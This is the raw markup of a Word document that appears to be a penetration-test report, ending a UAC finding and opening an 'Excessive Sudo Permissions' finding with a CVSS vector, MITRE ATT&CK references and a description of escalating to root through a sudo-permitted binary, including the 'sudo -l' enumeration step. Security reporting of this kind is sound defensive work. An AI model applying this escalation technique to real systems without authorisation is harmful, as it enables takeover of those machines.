          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the correct UAC settings via Group Policy Objects (GPO) </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1867BCD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to enforce it </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1867BCD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>across</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1867BCD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a domain environment, preventing users from disabling it and ensuring a consistent security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="668FD541" w14:textId="768EA62E">
      <w:pPr>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273BBEC5" w:rsidP="0D325B6E" w:rsidRDefault="273BBEC5" w14:paraId="682F8438" w14:textId="20A4048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3BBEC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8E5B9F3" w:rsidP="0D325B6E" w:rsidRDefault="28E5B9F3" w14:paraId="7EB9ABF3" w14:textId="2E63EB8A">
      <w:pPr>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hyperlink r:id="Ra4e69074d6d9415d">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="28E5B9F3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - User Account Control Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="109E381C" w14:textId="0E17080A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="70C2C06F" w:rsidP="0D325B6E" w:rsidRDefault="70C2C06F" w14:paraId="01AB795D" w14:textId="73F844F8">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28804892" w:id="1869398490"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70C2C06F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70C2C06F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc791020200" w:id="1801758737"/>
      <w:bookmarkStart w:name="_Toc2070878452" w:id="1071134971"/>
      <w:bookmarkStart w:name="_Toc1578589854" w:id="413723143"/>
      <w:bookmarkStart w:name="_Toc1295272629" w:id="1807381108"/>
      <w:bookmarkStart w:name="_Toc1324556368" w:id="786347598"/>
      <w:bookmarkStart w:name="_Toc2056261312" w:id="1654108122"/>
      <w:bookmarkStart w:name="_Toc664024688" w:id="349848860"/>
      <w:bookmarkStart w:name="_Toc1188382345" w:id="1744146411"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="001A641D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Excessive</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="001A641D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sudo Permissions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1654108122"/>
      <w:bookmarkEnd w:id="349848860"/>
      <w:bookmarkEnd w:id="1744146411"/>
      <w:bookmarkEnd w:id="1801758737"/>
      <w:bookmarkEnd w:id="1071134971"/>
      <w:bookmarkEnd w:id="413723143"/>
      <w:bookmarkEnd w:id="1807381108"/>
      <w:bookmarkEnd w:id="786347598"/>
      <w:bookmarkEnd w:id="186939849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1AFAF21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15CC80E" w14:textId="2AE4111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D47D59" w14:textId="724998F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A28B1DD" w14:textId="2EB0916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9EBD3E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65C4FD" w14:textId="7941E2F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AAFB9E9" w14:textId="438343D5">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15E0C646" w:rsidP="0D325B6E" w:rsidRDefault="15E0C646" w14:paraId="0084588A" w14:textId="5A5FF5D4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="15E0C646">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>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60CF9DD" w14:textId="2D358BEF">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0CF4842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2E995E" w14:textId="4050AC7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C820E9E" w:rsidP="0D325B6E" w:rsidRDefault="0C820E9E" w14:paraId="12E5995F" w14:textId="6EF514B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C820E9E">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E327112"/>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7713B29"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3950BA7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4F85124" w14:textId="73CDD4A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49B467A" w:rsidP="0D325B6E" w:rsidRDefault="349B467A" w14:paraId="11102578" w14:textId="597EA1F6">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="Rcfa5acafb8fd40cb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L</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AC:L</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AT:N</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PR:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>L</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UI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>N</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VC:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H</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VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H</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VA</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H</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SC</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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SI</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="349B467A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3EAF37E4">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DA1A19" w14:textId="65DFDD3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CFC21F5" w:rsidP="0D325B6E" w:rsidRDefault="4CFC21F5" w14:paraId="592C5F3B" w14:textId="7293B4A8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="4CFC21F5">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F06A1C4" w:rsidP="0D325B6E" w:rsidRDefault="4F06A1C4" w14:paraId="23E1FEDD" w14:textId="490C9335">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R719959058c404339">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4F06A1C4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1548.003 - Abuse Elevation Control Mechanism</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C3D5144">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C3D5144">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Sudo and Sudo Caching</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="55181D52">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271BB2C3"/>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7DB0E3" w:rsidP="0D325B6E" w:rsidRDefault="117DB0E3" w14:paraId="6DE21303" w14:textId="3C01EB0D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="117DB0E3">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32B1BC2" w:rsidP="0D325B6E" w:rsidRDefault="732B1BC2" w14:paraId="0E2F0CD7" w14:textId="7555E385">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R24717ba4e7d14271">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="732B1BC2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M102</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="732B1BC2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>8: Operating System Configuration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="732B1BC2" w:rsidP="0D325B6E" w:rsidRDefault="732B1BC2" w14:paraId="1D5076C3" w14:textId="56DFD2E8">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bc230ad535fa4479">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="732B1BC2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1026: Privileged Account Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="552D9A2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AC2D717" w14:textId="4C92512B">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1DDBAB1" w14:textId="531DF0A8">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8F2BCD3" w14:textId="18180DEF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="17ED8D56" w14:textId="17ACE2E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C54BB6F" w:rsidP="0D325B6E" w:rsidRDefault="4C54BB6F" w14:paraId="261EBFA8" w14:textId="3C67C79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4C54BB6F">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is </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able to</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use </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C54BB6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BINARY</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with </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="43ABD4A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udo</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permissions.</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This can be abused to elevate privilege from a </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non-privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C54BB6F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user to root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6090EB5F" w14:textId="5C41606F">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01A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="7925CCA2" w14:textId="1F353C9C">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01A641D">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188AEEB" w:rsidP="0D325B6E" w:rsidRDefault="2188AEEB" w14:paraId="3901FC10" w14:textId="28C92A68">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188AEEB">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adversary with access to the system who gained unauthorized access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2188AEEB">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2188AEE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02DD90C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">account </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2188AEEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to obtain root permissions on the system. This allows the attacker to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61825640">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">take down or </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61825640">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61825640">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the systems hosted on the machine, and access any sensitive information stored on it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="69E3737E" w14:textId="7A4C2A65">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01A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="089D8CA6" w14:textId="0D69BA7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01A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="44FEFCF5" w14:textId="2D5C01D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 xml:space="preserve">As a low-privileged </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user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C793F96">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 xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7D9DC15A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7D9DC15A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l </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 xml:space="preserve">to view </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sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7D9DC15A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A641D" w:rsidP="0D325B6E" w:rsidRDefault="001A641D" w14:paraId="57290A29" w14:textId="7535DB4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0416BFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
